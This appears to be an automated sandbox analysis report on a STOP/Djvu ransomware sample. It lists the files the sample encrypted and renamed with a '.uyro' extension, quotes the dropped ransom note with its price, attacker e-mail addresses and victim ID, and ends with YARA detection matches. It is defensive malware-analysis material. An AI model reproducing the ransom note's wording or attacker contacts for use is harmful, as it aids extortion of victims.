Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\flapper.gif entropy: 7.99721934119 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png entropy: 7.99094671707 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png entropy: 7.99396331293 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\kfm_folders_image.svg entropy: 7.99211560075 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\acm_low_disk_space_online_only.svg entropy: 7.99605241269 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\done_graphic.svg entropy: 7.99025058473 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\finderExtensionPrompt.svg entropy: 7.99526710076 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\folder_image_documents.svg entropy: 7.99192159907 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c863731-2a35-4444-9405-4d7cbb267ab4}\0.0.filtertrie.intermediate.txt entropy: 7.99183641623 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c863731-2a35-4444-9405-4d7cbb267ab4}\Apps.ft entropy: 7.99281406479 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c863731-2a35-4444-9405-4d7cbb267ab4}\Apps.index entropy: 7.99876519634 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{536fe6e8-a600-46a1-adbb-191db00f5995}\0.0.filtertrie.intermediate.txt entropy: 7.99103949604 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{536fe6e8-a600-46a1-adbb-191db00f5995}\Apps.ft entropy: 7.99273703708 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{536fe6e8-a600-46a1-adbb-191db00f5995}\Apps.index entropy: 7.99871144675 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nso-ZA\FileSync.LocalizedResources.dll.mui entropy: 7.99029743124 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91ed1363-4d6b-46a6-b5af-d1ee0e00268b}\0.0.filtertrie.intermediate.txt entropy: 7.99014171777 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91ed1363-4d6b-46a6-b5af-d1ee0e00268b}\Apps.ft entropy: 7.99262014283 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91ed1363-4d6b-46a6-b5af-d1ee0e00268b}\Apps.index entropy: 7.99878279768 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pa-Arab-PK\FileSync.LocalizedResources.dll.mui entropy: 7.99637167206 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ac30bccc-f672-44da-81fe-b3f316bbd507}\0.0.filtertrie.intermediate.txt entropy: 7.99026027718 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ac30bccc-f672-44da-81fe-b3f316bbd507}\Apps.ft entropy: 7.99442743123 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ac30bccc-f672-44da-81fe-b3f316bbd507}\Apps.index entropy: 7.9987430163 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\appsconversions.txt entropy: 7.99403941778 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\appssynonyms.txt entropy: 7.99767606024 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\rw\FileSync.LocalizedResources.dll.mui entropy: 7.99716449323 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\settingsconversions.txt entropy: 7.99503561135 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\settingsglobals.txt entropy: 7.9950159432 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\settingssynonyms.txt entropy: 7.9976174437 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{13d888a1-0da9-488d-b29e-c632055a5b8d}\0.0.filtertrie.intermediate.txt entropy: 7.99843394049 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{13d888a1-0da9-488d-b29e-c632055a5b8d}\Settings.ft entropy: 7.99874765159 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7b0be05b-dd29-4634-bd2c-c09b9631250d}\0.0.filtertrie.intermediate.txt entropy: 7.998237632 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7b0be05b-dd29-4634-bd2c-c09b9631250d}\Settings.ft entropy: 7.99856325981 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\MessagingBackgroundTaskLog.etl entropy: 7.99297738514 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ti\FileSync.LocalizedResources.dll.mui entropy: 7.99838926231 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\wo\FileSync.LocalizedResources.dll.mui entropy: 7.99869275521 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\xh-ZA\FileSync.LocalizedResources.dll.mui entropy: 7.9956248886 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\yo-NG\FileSync.LocalizedResources.dll.mui entropy: 7.9982607823 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-CN\FileSync.LocalizedResources.dll.mui entropy: 7.99796320318 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-TW\FileSync.LocalizedResources.dll.mui entropy: 7.99830075129 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat entropy: 7.99725586109 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2019-06-27_113458_1850-1854.log entropy: 7.9978716096 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1 entropy: 7.99745726518 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat entropy: 7.99779745496 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm entropy: 7.9933042204 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl entropy: 7.99695428486 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat entropy: 7.99644028819 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl entropy: 7.99738642168 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl entropy: 7.99703999482 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.LOG1 entropy: 7.99501738601 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui entropy: 7.99013403458 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui entropy: 7.99588139821 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\chrome_installer.log entropy: 7.99237075024 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui entropy: 7.99015668004 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Office\MSO1033.acl entropy: 7.99566565374 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT entropy: 7.99615692743 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe entropy: 7.99873980315 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\MSIMGSIZ.DAT entropy: 7.9960114755 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\SmartScreenCache.dat entropy: 7.99833031083 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst entropy: 7.99807962222 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin entropy: 7.9951655608 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\chrome_installer.log.uyro (copy) entropy: 7.99237075024 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Application Data\Microsoft\Office\MSO1033.acl.uyro (copy) entropy: 7.99566565374 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\Internet Explorer\MSIMGSIZ.DAT.uyro (copy) entropy: 7.99615692743 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe.uyro (copy) entropy: 7.99873980315 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temporary Internet Files\Low\MSIMGSIZ.DAT.uyro (copy) entropy: 7.9960114755 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temporary Internet Files\Low\SmartScreenCache.dat.uyro (copy) entropy: 7.99833031083 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeSysFnt19.lst.uyro (copy) entropy: 7.99807962222 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache.bin.uyro (copy) entropy: 7.9951655608 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\Internet Explorer\UrlBlock\urlblock_637194112741176080.bin.uyro (copy) entropy: 7.99442966622 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\ThirdPartyNotices.txt.uyro (copy) entropy: 7.99590032893 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db.uyro (copy) entropy: 7.99840183987 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000016.db.uyro (copy) entropy: 7.99843170661 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db.uyro (copy) entropy: 7.99821329563 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000b.db.uyro (copy) entropy: 7.99831618931 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.uyro (copy) entropy: 7.99833774153 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\MessagingBackgroundTaskLog.etl.uyro (copy) entropy: 7.99297738514 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.uyro (copy) entropy: 7.99725586109 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1.uyro (copy) entropy: 7.99745726518 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat.uyro (copy) entropy: 7.99779745496 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.uyro (copy) entropy: 7.9933042204 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl.uyro (copy) entropy: 7.99695428486 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat.uyro (copy) entropy: 7.99644028819 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl.uyro (copy) entropy: 7.99738642168 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl.uyro (copy) entropy: 7.99703999482 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.LOG1.uyro (copy) entropy: 7.99501738601 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui.uyro (copy) entropy: 7.99013403458 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui.uyro (copy) entropy: 7.99588139821 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui.uyro (copy) entropy: 7.99015668004 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IntlProvider.dll.mui.uyro (copy) entropy: 7.99409784357 Jump to dropped file
Writes a notice file (html or txt) to demand a ransom
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File dropped: C:\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-5ucwrds3edprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@fishmail.topreserve e-mail address to contact us:datarestorehelp@airmail.ccyour personal id:0609djfsieek6te1ygpnibo4gcgoep3ihx1cffhbueguxrgm3xs Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-5ucwrds3edprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@fishmail.topreserve e-mail address to contact us:datarestorehelp@airmail.ccyour personal id:0609djfsieek6te1ygpnibo4gcgoep3ihx1cffhbueguxrgm3xs Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption;device devices;encode encodes;encryption encryptions;locker;protection;secure;tpm"}},{"system.parsingname":{"type":12,"value":"aaa_settingsgrouppcsystemsupportinfo.settingcontent-ms"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagepcsysteminfo"},"system.setting.groupid":{"type":12,"value":"settingsgrouppcsystemsupportinfo"},"system.comment":{"type":12,"value":"get pc support info"},"system.highkeywords":{"type":12,"value":"help;support"}},{"system.parsingname":{"type":12,"value":"aaa_settingsgrouppcsystemtouchkeyboard.settingcontent-ms"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagetimeregionspelling"},"system.setting.groupid":{"type":12,"value":"settingsgrouppcsystemtouchkeyboard"},"system.comment":{"type":12,"value":"touch keyboard settings"},"system.highkeywords":{"type":12,"value":""}},{"system.parsingname":{"type":12,"value":"aaa_settingsgrouppcsystemwindowsinfo.settingcontent- Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\appsglobals.txt -> encryptiondesktop.desktop11814{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\elcomsoft password recovery\advanced archive password recovery\archpr.exe11815steam://rungameid/37200011815e1354d8c.581001032d2e9_97d7ef5pp7jwp!app11815xiaomi.miui.miphonemanager11816c:\gog games\the witcher 3 wild hunt\bin\x64\witcher3.exe11816sony.vaio.vaiomoviecreator11817prosiebensat.1digitalgmbh.7tv_fzbtnr0mjybby!app11818{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\adobe\adobe digital editions 3.0\digitaleditions.exe11818{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\intel\intel(r) ssd toolbox\intel ssd toolbox.exe11818{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\nuance\naturallyspeaking14\program\natspeak.exe1181946436stefanpodskubka.remoteterminal_gtq1wtggx9tf0!app11819{6d809377-6af0-444b-8957-a3773f02200e}\tigervnc\vncviewer.exe11820{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\mimo\mimo.exe11820desi..tion_edb36ae7cf19da31_e81d836730e1eada11821{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\prtg network monitor\enterprise co Jump to dropped file

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 5.3.U59WtZz2Sg.exe.3060000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 5.3.U59WtZz2Sg.exe.3060000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
